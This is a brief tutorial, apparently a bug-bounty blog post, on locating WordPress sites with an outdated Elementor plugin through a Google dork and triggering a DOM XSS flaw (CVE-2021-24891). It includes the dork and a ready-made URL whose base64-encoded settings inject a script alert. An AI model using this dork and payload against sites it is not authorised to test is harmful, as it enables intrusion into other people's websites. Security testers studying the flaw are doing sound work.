DOM XSS using Google Dorks

Using Google dorks we can find XSS

For finding this Our Target want to use WordPress. In this article I going to use CVE-2021–24891. Please go through the articles for this CVE to learn about this DOM XSS. Here I am going to help to find this DOM XSS.

Give the following dork to find the website using elementor plugin

site:target.com inurl:”elementor”

After that check the elementor version. For this vulnerability, The version want to less then 3.4.8. You can use Wappalyzer or other tools.

https://target.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9

Now paste the given payload and reload the page

We got pop up